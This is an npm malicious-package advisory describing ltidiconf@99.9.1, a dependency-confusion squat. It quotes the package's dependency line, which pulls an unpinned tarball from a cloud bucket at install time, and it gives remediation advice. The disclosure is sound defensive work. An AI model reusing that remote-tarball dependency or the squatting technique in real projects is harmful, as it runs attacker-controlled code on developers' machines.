npm · Malicious package advisory
Malwareltidiconf
MAL-2026-5767
Malicious code in ltidiconf (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a4ca306052ea5224831743daec9d3944fadff8cb4a7211e980be7669a739d00d)
ltidiconf@99.9.1 is an empty wrapper package (index.js is `module.exports = {};`, empty author/description, inflated 99.9.1 version) whose sole effect on install is to pull a single dependency declared as a direct tarball URL: `"ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.0.8.tgz"`. The bytes at that GCS bucket are mutable, unpinned, and not integrity-hashed; the bucket owner can swap the tarball at any time, and whatever code is in it executes at `npm install` time and on `require`. The wrapper has no functional content of its own, the bucket path literally contains the string `depenconf`, and the 99.9.1 version is the canonical shape of a dependency-confusion squat designed to shadow an internal package name and drop arbitrary attacker-controlled code into the installer's environment.
## Source: ghsa-malware (b949b5a457e726a907fa5e6b27ac585521202e3138218191b3bfe2945ecb39ff)
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
## Source: ossf-package-analysis (82f07d72efb0234c99f1db77fa557334d2cf010cd0a7020e470d6e72518c0a5d)
The OpenSSF Package Analysis project identified 'ltidiconf' @ 99.9.1 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
Compromised versions (1)
- 99.9.1
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.